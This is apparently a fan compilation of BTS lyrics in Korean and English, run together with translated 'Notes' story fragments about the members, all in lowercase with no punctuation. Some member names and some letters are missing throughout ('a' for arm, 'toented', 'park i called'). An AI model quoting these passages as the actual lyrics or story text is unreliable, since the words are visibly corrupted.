up up all i'm a born singer just a bit late to confess i swear there's a mirage right here always far from me yes it's here i'm a born singer just a bit early to confess anyway i'm so happy i'm good yeah yeah yeah run alternative mix 넌 내 하나뿐인 태양 세상에 딱 하나 널 향해 피었지만 난 자꾸 목말라 너무 늦었어 늦었어 너 없이 살 순 없어 가지가 말라도 더 힘껏 손을 뻗어 손 뻗어봤자 금세 깨버릴 꿈 꿈 꿈 미칠 듯 달려도 또 제자리일 뿐 뿐 뿐 그냥 날 태워줘 그래 더 밀쳐내줘 이건 사랑에 미친 멍청이의 뜀박질 pre 더 뛰게 해줘 나를 더 뛰게 해줘 두 발에 상처만 가득해도 니 얼굴만 보면 웃는 나니까 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 post run don't tell me bye bye run you make me cry cry run love is a lie lie don't tell me don't tell me don't tell me bye bye 다 끝난 거라는데 난 멈출 수가 없네 땀인지 눈물인지 나 더는 분간 못해 oh 내 발가벗은 사랑도 거친 태풍 바람도 나를 더 뛰게만 해 내 심장과 함께 pre 더 뛰게 해줘 나를 더 뛰게 해줘 두 발에 상처만 가득해도 니 얼굴만 보면 웃는 나니까 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 추억들이 마른 꽃잎처럼 산산이 부서져가 내 손 끝에서 내 발 밑에서 달려가는 네 등 뒤로 마치 나비를 쫓듯 꿈 속을 헤매듯 너의 흔적을 따라가 길을 알려줘 날 좀 멈춰줘 정지 날 숨쉬게 해줘 다시 run run run 난 멈출 수가 없어 또 run run run 난 어쩔 수가 없어 어차피 이것밖에 난 못해 너를 사랑하는 것 밖엔 못해 다시 run run run 넘어져도 괜찮아 또 run run run 좀 다쳐도 괜찮아 가질 수 없다 해도 난 족해 바보 같은 운명아 나를 욕해 run don't tell me bye bye run you make me cry cry run love is a lie lie don't tell me don't tell me don't tell me bye bye if i ruled the world i'd do it all westside westside westside westside till i die gimme the real world man if i ruled the world i'd do it all westside westside westside if i ruled the world i'd have it all 남자라면 똑같겠지 pretty girls 완전히 없어지네 인종차별 european asian caucasian girls i have 'em 그리곤 불러 릭오웬스 앤드뮬뮈스터 알렉산더 왕 셰인 올리버 평생 만들게 해 김남준 컬렉션 옷 색깔은 까만색으로 이제야 좀 만족스러 music turn it up 지루해져 후비는 콧구녕 노랠 만들어 지구상 모든 사람들에게 부르게 해 노래 제목은 애구가 이쁜 여자들에게 파묻혀 tv를 봐 세상의 모든 여자들 날 위해 ready to die 남자들 너넨 술 가져와 그냥 없어져도 좋아 어쨌든 여긴 내 왕국이니까 if i ruled the world i'd do it all i'd do it all i said for 
the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 if i ruled the world 가끔 꿈을 꿔 내가 만약 세상을 지배한다면 일단 먼저 난 공인중개사를 찾아가 가족과 함께 살 집을 사고파 그래 그 다음은 내 장롱면허 잠에서 깨워줘야지 4륜구동 차를 구입하고 기름을 주입하고 이런 게 무리라도 무이자인 할부로 주식과 도박 그딴 건 안 하고파 세상을 지배했는데 왜 그리 꿈이 소박 하냐는 질문은 마 난 방탄 식구들과 그래도 여전히 i'm still 음악이고파 난 힙합계의 김정은이 되서 우리 음악 말곤 심의를 걸겠어 얼토당토 안 한 꿈이지만 it's my dream 놀리지 마 if i ruled the world i'd do it all i'd do it all i said for the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 oh girl 어디 oh god 여기 세상에 모든 여자들은 hope world 줄 섰지 모든 money 거뜬하게 써도 내 지갑이란 골대에 돈이 골인되지 또 겁 없이 무대 위를 걸어다니지 달리지 않아도 갈수록 쌓여가는 마일리지 이런 꿈들을 이젠 내게 곧 선물하겠어 방탄이란 이름 걸고 외쳐 if i ruled the world if i ruled the world i'd do it all i'd do it all i said for the money for the money if i ruled the world i'd do it all i'd do it all i said for the money for the money everybody say heoeohoh everybody say heoeohoh everybody say hey ho heyheyho 말도 안 된다는 걸 아는데 불러보는 철없는 노래 trivia 承 love yeah yeah is this love yeah is this love yeah sometimes i know yeah sometimes i don't yeah 이 다음 음 뭐라고 쓸까 음 너무 많은 말이 날 돌지만 내 마음 같은 게 하나 없어 그냥 느껴져 해가 뜨고 나면 꼭 달이 뜨듯이 손톱이 자라듯 겨울이 오면 나무들이 한 올 한 올 옷을 벗듯이 넌 나의 기억을 추억으로 바꿀 사람 사람을 사랑으로 만들 사람 널 알기 전 내 심장은 온통 직선뿐이던 거야 난 그냥 사람 사람 사람 넌 나의 모든 모서릴 잠식 나를 사랑 사랑 사랑 으로 만들어 만들어 우린 사람 사람 사람 저 무수히 많은 직선들 속 내 사랑 사랑 사랑 그 위에 살짝 앉음 하트가 돼 post i live so i love i live so i love i live so i love i live so i love yeah live love live love live love live love i live so i love i live so i love i live so i love i live so i love yeah live love live love if it's love i will love you you make i to an o i to an o i to an o 너 땜에 알았어 왜 사람과 사랑이 비슷한 소리가 나는지 you make live to a love live to a love yeah 너 땜에 알았어 왜 사람이 사랑을 하며 살아가야 하는지 i와 
u의 거린 멀지만 f jklmnopqrst 모든 글잘 건너 내가 네게 닿았지 봐 내와 네도 똑같은 소리가 나잖아 그렇다고 내가 넌 아니지만 너의 책장의 일부가 되고파 너의 소설에 난 참견하고파 연인으로 난 그냥 사람 사람 사람 넌 나의 모든 모서릴 잠식 나를 사랑 사랑 사랑 으로 만들어 만들어 우린 사람 사람 사람 저 무수히 많은 직선들 속 내 사랑 사랑 사랑 그 위에 살짝 앉음 하트가 돼 post i live so i love i live so i love i live so i love i live so i love yeah live love live love live love live love i live so i love i live so i love i live so i love i live so i love yeah live love live love if it's love i will love you 만약 내가 간다면 어떨까 내가 간다면 슬플까 넌 no 만약 내가 아니면 난 뭘까 결국 너도 날 떠날까 refrain 스치는 바람 바람 바람 만 아니길 바랄 뿐 흘러갈 사람 사람 사람 만 아니길 바랄 뿐 기분은 파랑 파랑 파랑 머릿속은 온통 blue 널 얼마나 마나 마나 yeah 얼마나 마나 마나 yeah 넌 나의 사람 사람 사람 yeah yeah yeah yeah 넌 나의 바람 바람 바람 yeah yeah yeah yeah 넌 나의 자랑 자랑 자랑 yeah yeah yeah yeah 넌 나의 사랑 나의 사랑 단 한 사랑 단 한 사랑 넌 나의 사람 사람 사람 yeah yeah yeah yeah 넌 나의 바람 바람 바람 yeah yeah yeah yeah 넌 나의 자랑 자랑 자랑 yeah yeah yeah yeah 넌 나의 사랑 나의 사랑 단 한 사랑 단 한 사랑 you know you are always meant to be destiny all before the same old night love seok 0 august year can anyone remember the moment they fall in love can anyone predict the moment their love will end what could be the reason that humans dont have the ability to recognize those moments and why was i given the power to return all of those things the car came to a sudden stop the headlights flash crashing bouncing falling i did nothing but stand defenseless in the face of all of those moments i heard no sound and felt no sensations it was summer but the wind seemed cold there was the sound of something tumbling along the street then there was the scent of flowers only then did a sense of reality come to me the bouquet of smeraldo flowers fell from my hand she was laying there in the middle of the street there was blood flowing in between the strands of her hair the dark red blood flowers along the street i thought if only i could turn back time seok july year 0 past the school doors the sound of cicadas prickled my ears the school yard was crowded with kids laughing and playing and competing in 
races it was the start of summer vacation and everyone was chattering i ducked my head and walked in between them i wanted to leave as quickly as i could hyung i lifted my head surprised by the sudden appearance of someones shoulder it was hoseok and they looked at me their smiles as wide and bright as ever and their eyes full of mischief today is the start of vacation are you still going to leave hoseok asked tugging at my a i muttered sure and a few more meaningless words then turned my head away what had happened that day was clearly an accident it wasnt intentional i hadnt imagined that and yoongi would be in the storage room at that time the principal suspected that i was covering for my dangsaengs i had to say something but in the end yoongi had gotten expelled nobody knew that i had been the complicit have a good vacation hyung ill call you maybe having interpreted my expression hoseok let his hand drop slightly and forced an even brighter greeting i couldnt answer this time either there was nothing i could say as i passed the school gate i thought of the first day i had come to this school we had all been punished for tardiness together we could laugh because of it i had ruined these moments yoongi 5 june year i wasn't aware of anything other than the sound of music playing in my head not how much i had drunk nor where i was nor what i had been doing i didnt know and it wasnt important when i went outside stumbling it was already night i swayed as i walked i bumped into pedestrians news kiosks walls i didnt care i just wanted to forget everything s voice was still ringing in my ears hyung my next memory was of running like crazy up the hospital steps the hospital hall had been strangely long and dark i passed people wearing hospital gowns my heart pounded everyones faces were too pale they had no expressions they all seemed like dead people the sound of my breathing was harsh inside my own head inside the slightly opened hospital room door was lying there i 
turned my head without realizing it i couldnt look at him at that moment i suddenly heard the sound of a piano of flames of a building crumbling down i clutched my head and sank down this is your fault if it wasnt for you it was my mothers voice no my voice no someones voice at those words i was toented by countless moments i wanted to believe it wasnt so but was lying there was lying in a hall full of corpse like patients passing by i was utterly unable to go inside i couldnt check for myself when i stood my legs threatened to give out i left with tears flowing it was funny i couldnt even remember the last time i had cried i went to cross the street but someone grabbed my a and i came to a halt who was it no i didnt care no matter who it was it was all the same dont come near me go away just leave me be i dont want to hurt you either i dont want to be hurt so please dont come any closer yoongi june year 9 i thoughtlessly ditched school but truthfully i didnt have anywhere to go it was hot i had no money and i had nothing to do it was namjoon who said we should go to the beach the younger kids seemed excited but i didnt particularly feel like it nor did i dislike the idea do we have money at my question namjoon made everyone shake out their pockets a few coins a few bills so we cant go the one who said we could just walk was probably taehyung namjoon made a face begging them to reconsider but the kids just chattered away laughing and pretending to roll around on the road before starting to walk i wasnt in the mood to talk back so i just fell behind it was midday so even the gingko trees couldnt provide shade and the cars kicked up dust as they passed us on the sidewalkless road lets go there it was taehyung this time too or was it hoseok i didnt care so i didnt look carefully but it would have been one of them i had been walking along with my head down kicking dirt when i almost collided with someone i lifted my head was standing there as if frozen in place the 
muscles in his face trembled as if had seen something terrifying he was staring at a sign that said flowering arboretum kilometers i didnt want to walk i heard s voice sweat dripped from s face he went pale as if he might collapse at any second what is it i had a strange feeling park i called but as i expected he didnt budge i lifted my head again and looked at the sign hey its so hot why would we go to an arboretum lets go to the beach i said as if dragging my feet i didnt know what kind of place the arboretum was but it didnt seem like we should go whatever the reason s expression was strange we dont even have money hoseok replied thats why were walking and taehyung added if we just walk to the train station we can probably make it then namjoons said instead well just starve at dinner and taehyung pretended to cry and seok hyung laughed only started to move again once it was decided that we would take the road toward the train station walking with his head down and his shoulders trembling seemed like a small child i looked up at the sign again the characters spelling flowering arboretum were gradually getting further away namjoon july year i rested my head against the bus window from the library to the gas station the scenery passed by the window almost frighteningly familiar since i took this route everyday would there come a day i could leave this scenery behind i felt that it was impossible to predict what tomorrow would bring nor to hope for anything there was a woman sitting in front of me her hair tied with a yellow rubber band her shoulders lifted and then dropped as if she was sighing then she rested her head against the window for around a month already we had studied at the same library and gotten on the bus at the same stop we hadnt spoken a word to each other but we looked at the same scenery and lived on the same time and sighed the same sighs the hair tie was still in my pants pocket the woman always got off the bus three stops before i did every 
time i saw her leave i wondered if she was going to distribute fliers what kind of time was she spending what kind of things was she enduring how strongly did she feel stifled at the thought that tomorrow might not come or that from the beginning there had never been such a thing as tomorrow i thought things like that the womans stop began to approach someone pressed the stop request button and other passengers stood up from their seats but in the midst of this that woman didnt stir she just stayed in her seat her head against the window it seemed like she was asleep should i go and wake her i fought with myself for a moment the bus approached the stop the woman didnt move people disembarked the door closed and the bus started to move the woman didnt wake even as we passed the next three stops as i moved to the bus door i fought with myself again it was clear that once i got off the bus no one else would pay attention to her she would wake up somewhere far from her stop and it was impossible to know how much more tired she would be today because of it i left the bus stop and started to walk toward the gas station the bus took off and i didnt look back i had left the hair tie on top of her bag but that was it that wasnt a beginning and as such nor was it an end it was nothing to start with and there was no reason for it to be anything so i thought it really didnt matter namjoon 7 december year the people waiting for the bus rubbed their hands together in the cold i looked down at the dirt clutching the strap of my bag i was trying to not make eye contact with anyone it was a countryside village where only two buses stopped per day from a distance i saw the first bus approaching i boarded the bus behind everyone else i didnt look back when i was passionate about something when i barely had something in my grasp when i had nothing left but things to escape i had conditions i wasnt to look back the moment i looked back the efforts id made until now became little more 
than seafoam looking back that was a kind of suspicion a kind of lingering attachment and a kind of fear only when i had overcome these things could i finally escape the bus started off i had no plans i had nothing i was passionate about nothing in my group no particular reason to escape it was closer to thoughtlessly running away from my mothers tired face my wandering sibling my fathers illness starting with the situation in our house that grew more difficult with every passing day from my family who enforced sacrifice and tranquility and from me who pretended to know nothing and restrained myself from trying to adjust and grow resigned but most of all it was closer to running from poverty if anyone asked if its a crime to be poor everyone would say its not but is that really the truth poverty gnaws on so many things things that were precious become meaningless you give up things you cant give up you grow suspicious and fearful and resigned the bus would arrive at a familiar stop in a few hours when i left from that place a year ago i had left no message behind and now i was returning with no sign or warning i tried to recall my friends faces i had cut off contact with all of them what were they all doing these days would they be glad to see me would we be able to get together and laugh the way we had back then there was frost on the windows and i couldnt see the scenery outside on top of the frost i slowly moved my finger i have to survive hoseok 4 july year i stood in the hallway the whole time she was receiving first aid even though it was night the hospital hallway was bustling with people moisture dripped from my hair wet with sweat and rain i dropped the bag i had taken off of her a variety of things tumbled out of it a few coins rolled away and a ball pen and a towel in the middle of it all was an airplane eticket i picked it up and scanned it at that moment the doctor called me he said it was a mild concussion and nothing to worry about and after a moment 
she came out as well are you okay she said that her head just hurt a little and she took her bag from me then she spotted the eticket peeking out and looked up at my face i shifted my bag to my other shoulder and said that we should go pretending that it was nothing as we left the hospital it was raining as hard as ever we stood side by side outside the door hoseokah she said it looked like she had something to say wait a second ill get an umbrella i ran off thoughtlessly into the rain there was a convenience store in the distance i knew that she had auditioned for an overseas dance team some time ago the plane ticket meant that she had made it i didnt want to hear her say it i didnt have the confidence to congratulate her hoseok july year 0 when i counted to three i heard the sound of laughter like a hallucination the next moment the young me passed by holding someones hand i looked back quickly but there was no one there except my classmates staring at me hoseokah the teacher called my name only then did i realize where i was it was a class field trip i was counting the fruits that were drawn in the textbook five six i kept counting but as i did my voice trembled and my hands grew sweaty the memory of that time kept surfacing i couldnt clearly remember my mothers face that day i only remembered the chocolate bar she gave me as we looked around the amusement park hoseokah count to ten and then open your eyes when i had finished counting and opened my eyes my mother was gone i waited and waited but she never returned i had only counted to nine if i counted one more it would have been fine but my voice wouldnt come out my ears were ringing and my surroundings grew cloudy the teacher kept pointing telling me to keep counting my friends were staring at me i couldnt remember my mothers face it seemed like if i counted one more my mother would really never come back for me just like that i collapsed to the ground 4 july year by the time i returned to my senses i had 
washed my a so much that i was losing skin my hands were trembling and i was short of breath my eyes were bloodshot what had just happened came back to me in fragments for a moment i had lost focus i was dancing with a noona from the dance club a collaborative dance but i had lost my flow and we collided i fell to the rough floor and my a started to bleed at that moment i had remembered what happened at the flowering arboretum i thought that i had overcome it but that wasnt the case i had to run away i had to wash it away i had to look away the me in the mirror was the same eightyearold kid who had run away in the rain then all at once i realized noona had fallen down too there was nothing i could do all i could do was fall and hurt someone leave them behind and tremble at my own pain only to run after them too late with an umbrella before stopping every time i took a step rainwater soaked my sneakers car headlights passes me by it wasnt okay no it was okay it didnt hurt it wasnt that serious of an injury i was really okay 9 may year in the end i had to go to the flowering arboretum i had quit telling myself the lie that i didnt remember what happened there i had to stop living in hiding in the hospital and stop having seizures if i wanted to do that i had to go to the place with that intent i went to the bus stop every day but i couldnt ride the bus to the arboretum yoongi hyung came and sat next to me after id already let three buses go by i asked what was up and hyung said he was bored and had nothing to do then he asked why i was sitting here like this i thought about why i was sitting here like this it was because i had no courage i wanted to pretend i was okay now that i knew a little that i surpassed it on my own but in truth i was afraid i was afraid that i might encounter something that i might not withstand that i might have another seizure yoongi hyung looked relaxed he slumped down like had not a thing in the world to worry him and said that the weather 
was nice said all kinds of useless things after i heard that i realized the weather really was nice i had been so worried that i didnt bother looking at my surroundings the sky was so blue a wa breeze blew on occasion from far off the shuttle bus for the arboretum was coming the bus stopped and the door opened the driver looked at me on impulse i spoke hyung do you want to come with me taehyung 7 july year my side hurt so badly it seemed to be tearing sweat fell in drops in the nooks and crannies of the railroad in the vacant lot behind the convenience store under the overpass the girl was nowhere to be found i had even run to the bus stop but as expected i didnt see her the people waiting for their buses looked at me strangely what had happened we hadnt promised to meet but it was still strange that girl always appeared from somewhere and followed me around even if i told her it was annoying it was no use but now she was nowhere to be found even in the places we used to go together i came to a familiar wall and slowed my steps there was graffiti there we had drawn together it was the first thing she had ever drawn on top of it there was a large x drawn it was her i hadnt seen her do it but i knew why there was no response instead several after images overlapped on the wall her laughing at me after i had lain down on the railroad tracks and hit my head her helping me up after id fallen trying to help her run away her angry expression when we passed in front of a photo studio with a family photo in the window her gaze following the students we passed by unbeknownst even to her as we had sprayed this wall together i had said if you have a problem tell me about it dont just grumble to yourself the x was drawn over all of those memories it seemed like it was saying all of it was fake i had made my hands into fists why of course there was no response i kept walking we were alone again me and her taehyung 0 march year 0 i slid down the hallway my feet making noisy sounds 
then i stopped i could see namjoon standing in front of our classroom our classroom nobody knew this but i called that place our classroom me and the hyungs and it was ours i caught my breath and approached i was going to startle them principal i had barely taken five steps when i head an urgent voice through the open classroom window it seemed like seok hyung i stopped walking was seok hyung talking to the principal right now in our classroom why then i heard my name and yoongi hyungs and i saw namjoon hyung draw in a startled breath as if having sensed it seok hyung suddenly opened the door there was a phone in seok hyungs hand his shock and confusion was plain on his face i couldnt see namjoon hyungs expression i hid and watched seok hyung looked confused hyung must have had a reason after he spoke namjoon hyung passed by seok hyung and went into the classroom i couldnt believe it seok hyung told the principal what yoongi hyung and i had done for the last several days he told everything about skipping class and climbing over the wall and fighting with other kids but namjoon hyung said that was all okay what are you doing here i turned around in shock it was hoseok hyung and hoseok hyung pretended to be even more shocked then slung his a over my shoulders in a moment of confusion i let hoseok hyung pull me into that classroom namjoon hyung and seok hyung were talking and they looked up seok hyung got up in a hurry and said something had come up he left the classroom i looked at namjoon hyungs expression he had watched seok hyungs retreating back but now he laughed as if nothing was wrong at that moment a thought occurred to me namjoon hyung must have had a reason because hyung knew more than me and was smarter and older and because this was our classroom i went into the classroom smiling the foolish smile that the others teasingly called my rectangle smile i thought that i wouldnt tell anyone else that i had overheard that conversation 6 july year i sneakily 
broke a flower off the hospitals wreath i kept laughing and having to bow my head to hide it the midsummer sunlight was blindingly bright i knocked on the hospital room door but there was no reply i knocked again no one was there it was only full of a very quiet darkness i left the hospital room i had met her here when i was bored and stifled and pushing my wheelchair like crazy up and down the hallway she had appeared so suddenly that i barely had time to stop and there she stood a girl with her hair tied up in a ponytail when i left the hospital i saw a bench i remembered we had listened to music together and drawn sitting there i was still holding the wildflower in my hand there was no one to give it to 0 september year 0 jeon youre not still going there are you i didnt answer i just stood there staring at the toes of my shoes when i didnt answer he hit me on the head with the attendance file but even so i didnt open my mouth it was the classroom i used with the hyungs after the day i had followed the hyungs around and we had discovered that classroom there wasnt a single day i hadnt gone maybe the hyungs didnt know sometimes they didnt come because they had other plans or were busy with parttime jobs i hadnt seen either seok hyung or yoongi hyung in a few days but not me i didnt skip a single day there were days when nobody came at all but that's okay even if it wasnt today then they would come tomorrow and if not tomorrow then the day after it was okay you only learned bad things following them around he hit me again i lifted my gaze and looked at him he hit me again the image came to me of yoongi hyung hitting me i gritted my teeth and endured i didnt want to lie and say i hadnt been going now i was standing again in front of that classroom it seemed like the hyungs would be there if i opened the door it seemed like they would look up from the fame they were playing and ask me why i was so late seok hyung and namjoon hyung would be reading books yoongi hyung 
would be playing the piano and hoseok hyung and hyung would be dancing but when i opened the door only hoseok hyung was there he was cleaning up the things we had left behind in the classroom i held the door handle and just stood there hyung came over and put his a around my shoulders then he led me outside lets go the classroom door closed behind us i suddenly realized those days were gone and they would never return stigma 숨겨왔어 i tell you something 그저 묻어두기엔 이젠 버틸 수가 없는 걸 왜 그땐 말 못 했는지 어차피 아파와서 정말 버틸 수가 없을 걸 pre now cry 너에게 너무 미안할 뿐야 또 cry 널 지켜주지 못해서 더 깊이 더 깊이 상처만 깊어져 되돌릴 수 없는 깨 유리 조각 같아 더 깊이 매일이 가슴만 아파져 내 죄를 대신 받던 연약하기만 했던 너 그만 울고 tell me something 용기 없던 내게 말해봐 그 때 나한테 왜 그랬어 미안 됐어 내게 무슨 자격 있어 이래보라고 저래보라고 너에게 말하겠어 더 깊이 더 깊이 상처만 깊어져 되돌릴 수 없는 깨 유리 조각 같아 더 깊이 매일이 가슴만 아파져 내 죄를 대신 받던 연약하기만 했던 너 i'm sorry i'm sorry i'm sorry my brother 숨겨도 감춰도 지워지지 않어 are you calling me a sinner 무슨 말이 더 있겠어 i'm sorry i'm sorry i'm sorry my sister 숨겨도 감춰도 지워지지 않어 so cry please dry my eyes ooh 저 빛이 저 빛이 내 죄를 비춰줘 돌이킬 수 없는 붉은 피가 흘러내려 더 깊이 매일이 죽을 것만 같아 그 벌을 받게 해줘 내 죄를 사해줘 제발 너의 컨버스하이 너의 컨버스하이 너의 컨버스하이 컨버스하이 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo 내게 하루만 시간이 있다면 난 컨버스하이 만든 사람을 만날 거야 그리곤 말하겠지 당신이 이 세상을 구했어 넌 저 여자들을 다시 태어나게 한 거야 f your chanel f your alexander mcqueen f your raf simons 일단 이리 와서 check it 0만원이면 두 켤레를 사 넌 내가 원하는 걸 알지 흰 티에 청 반바지 빨간 컨버스하이 that's it alright 빨주노초파남보 니 발에 무지개는 shot like 람보 날 저격해 탕탕 shout out wow wow 니 몸매와 함께면 더 하악하악 컨 taxi 컨 cycle 컨 subway no thanks 난 컨 bus 타고 부릉부릉 저 하늘 별보단 오늘은 니 신발의 별을 볼래 하하 다 남준이 몰래 pre 스치면 인연 스며들면 사랑 이라고 누가 말했었는데 넌 아예 내게 물들어버렸나 니가 좋아 그래도 컨버스로우는 신지 마 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo post all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 컨버스 컨버스 i really hate 컨버스 화려한 니 겉모습에는 말야 검정스타킹에 아찔한 하이힐 그래 그것은 사기야 근데 더 어울리는 것은 조던 numbers ha 모르겠니 컨버스는 니 매력을 죽이는 옥의 티 아무튼 날 만날 때는 컨버스를 신지마 무엇보다 벗기가 무척이나 힘들잖아 pre 스치면 인연 스며들면 사랑 이라고 누가 말했었는데 넌 아예 내게 물들어버렸나 니가 
좋아 그래도 컨버스로우는 신지 마 너의 컨버스하이에 꽂혔나 봐 별 수 없나 봐 나는 wo 너의 컨버스하이에 꽂혔나 봐 너무 좋아 다 자꾸 wo post all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 all 너의 컨버스하이 i really really want you 컨버스하이 i really really like you 컨버스하이 i really really need you 컨버스하이 컨버스하이 conhigh 보고 싶다 이렇게 말하니까 더 보고 싶다 너희 사을 보고 있어도 보고 싶다 너무 야속한 시간 나는 우리가 밉다 이젠 얼굴 한 번 보는 것 조차 힘들어 우리가 여긴 온통 겨울 뿐이야 팔월에도 겨울이 와 마음은 시간을 달려가네 홀로 남은 설국열차 니 손 잡고 지구 반대편까지 가 겨울을 끝내고파 그리움들이 얼마나 눈처럼 내려야 그 봄날이 올까 friend pre 허공을 떠도는 작은 먼지처럼 작은 먼지처럼 날리는 눈이 나라면 조금 더 빨리 네게 닿을 수 있을 텐데 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 oohoohooh post 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 니가 변한 건지 니가 변한 건지 아니면 내가 변한 건지 아니면 내가 변한 건지 이 순간 흐르는 시간조차 미워 우리가 변한 거지 뭐 모두가 그런 거지 뭐 그래 밉다 니가 넌 떠났지만 단 하루도 너를 잊은 적이 없었지 난 솔직히 보고 싶은데 이만 너를 지울게 그게 널 원망하기보단 덜 아프니까 pre 시린 널 불어내 본다 연기처럼 하얀 연기처럼 말로는 지운다 해도 사실 난 아직 널 보내지 못하는데 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 ahahahah ah you know it all you're my best friend 아침은 다시 올 거야 어떤 어둠도 어떤 계절도 영원할 순 없으니까 벚꽃이 피나봐요 이 겨울도 끝이 나요 보고 싶다 보고 싶다 ah 보고 싶다 보고 싶다 ahahah 조금만 기다리면 기다리면 며칠 밤만 더 새우면 만나러 갈게 만나러 갈게 데리러 갈게 데리러 갈게 yeah eheh yeah yeah post 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 i'm fine 시리도록 푸른 하늘 아래 눈 떠 흠뻑 쏟아지는 햇살이 날 어지럽게 해 한껏 숨이 차오르고 심장은 뛰어 느껴져 너무 쉽게 나 살아있다는 걸 괜찮아 우리가 아니어도 슬픔이 날 지워도 먹구름은 또 끼고 나 끝없는 꿈 속이어도 한없이 구겨지고 날개는 찢겨지고 언젠가 내가 내가 아니게 된달지어도 괜찮아 오직 나만이 나의 구원이잖아 못된 걸음걸이로 절대 죽지 않고 살아 how you doin' i'm fine 내 하늘은 맑아 모든 아픔들이여 say goodbye 잘 가 pre 차가운 내 심장은 널 부르는 법을 잊었지만 외롭지 않은 걸 괜찮아 괜찮아 깜깜한 밤 어둠은 잠든 꿈을 흔들어 놓지만 두렵지 않은 걸 괜찮아 괜찮아 i'm feeling just fine fine fine 이젠 너의 손을 놓을게 i know i'm all mine mine mine cuz i'm just fine i'm feeling just fine fine fine 더 이상은 슬프지 않을래 i could see the sunshine shine shine cuz i'm just fine just fine hey hope world i'm just fine 내 아픔 다 이겨낼 수 있어 너 없이 나 i'm just fine 걱정 마 이젠 웃을 수 있고 네 목소린 모두 알아 주니까 4 i'm so fine 
you so fine 슬픔과 상처는 모두 다 이미 지나간 추억이 됐으니 웃으며 보내주자고 we so fine i'm so fine you so fine 우리들 미래는 기쁨만 가득할 테니 걱정은 접어둔 채 이젠 즐겨 수고했어 we so fine pre 차가운 내 심장은 널 부르는 법을 잊었지만 외롭지 않은 걸 괜찮아 괜찮아 깜깜한 밤 어둠은 잠든 꿈을 흔들어 놓지만 두렵지 않은 걸 괜찮아 괜찮아 i'm feeling just fine fine fine 이젠 너의 손을 놓을게 i know i'm all mine mine mine cuz i'm just fine i'm feeling just fine fine fine 더 이상은 슬프지 않을래 i could see the sunshine shine shine cuz i'm just fine just fine 혹시 너에게도 보일까 이 스산한 달빛이 너에게도 들릴까 이 희미한 메아리가 i'm feeling just fine fine fine 혼자서라도 외쳐보겠어 되풀이될 이 악몽에 주문을 걸어 i'm feeling just fine fine fine 몇 번이라도 되뇌보겠어 또 다시 쓰러대도 난 괜찮아 i'm feeling just fine fine fine 혼자서라도 외쳐보겠어 되풀이될 이 악몽에 주문을 걸어 i'm feeling just fine fine fine 몇 번이라도 되뇌보겠어 또 다시 쓰러대도 난 괜찮아 i'm fine i'm fine bts 봄날 brit rock remix hangul 보고 싶다 oooh oooh 보고 싶다 이렇게 말하니까 더 보고 싶다 너희 사을 보고 있어도 보고 싶다 너무 야속한 시간 나는 우리가 밉다 이젠 얼굴 한 번 보는 것도 힘들어 우리가 여긴 온통 겨울 뿐이야 팔월에도 겨울이 와 마음은 시간을 달려가네 홀로 남은 설국열차 니 손 잡고 지구 반대편까지 가 겨울을 끝내고파 그리움들이 얼마나 눈처럼 내려야 그 봄날이 올까 friend 허공을 떠도는 작은 먼지처럼 작은 먼지처럼 날리는 눈이 나라면 조금 더 빨리 네게 닿을 수 있을 텐데 pre 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 추운 겨울 끝을 지나 다시 봄날이 올 때까지 꽃 피울 때까지 그곳에 좀 더 머물러줘 머물러줘 4 니가 변한 건지 니가 변한 건지 아니면 내가 변한 건지 아니면 내가 변한 건지 이 순간 흐르는 시간조차 미워 우리가 변한 거지 뭐 모두가 그런 거지 뭐 5 그래 밉다 니가 넌 떠났지만 단 하루도 너를 잊은 적이 없었지 난 솔직히 보고 싶은데 이만 너를 지울게 그게 널 원망하기보단 덜 아프니까 6 시린 널 불어내 본다 연기처럼 하얀 연기처럼 말로는 지운다 해도 사실 난 아직 널 보내지 못하는데 pre 눈꽃이 떨어져요 또 조금씩 멀어져요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 얼마나 기다려야 또 몇 밤을 더 새워야 널 보게 될까 널 보게 될까 만나게 될까 만나게 될까 you know it all youre my best friend 아침은 다시 올 거야 어떤 어둠도 어떤 계절도 영원할 순 없으니까 pre 벚꽃이 피나봐요 이 겨울도 끝이 나요 보고 싶다 보고 싶다 보고 싶다 보고 싶다 조금만 기다리면 며칠 밤만 더 새우면 만나러 갈게 만나러 갈게 데리러 갈게 데리러 갈게 추운 